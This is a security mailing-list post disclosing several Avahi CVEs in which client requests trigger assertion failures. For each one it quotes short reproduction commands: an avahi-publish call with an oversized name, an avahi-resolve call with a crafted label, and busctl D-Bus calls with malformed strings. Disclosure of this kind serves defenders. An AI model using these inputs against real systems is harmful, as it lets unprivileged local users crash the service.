Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 6 Oct 2023 14:19:17 -0700
From: Alan Coopersmith <>
Subject: CVEs assigned for reachable assertions in avahi

While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVE's being assigned for client requests that can
cause the Avahi server to abort with an assertion failure.  Only one of
them has a fix available so far.


  Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users
  (unless disable-user-service-publishing is set to yes explicitly):

  avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"


  Reachable assertion in avahi_escape_label

"avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"



  Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

  busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"


  Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

   org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0


   avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

  from inside a client creating EntryGroups. It can be triggered by unprivileged
  users unless disable-user-service-publishing is set to yes explicitly.
  By default it's set to no."


   Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

         -Alan Coopersmith-       
          Oracle Solaris Engineering -

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.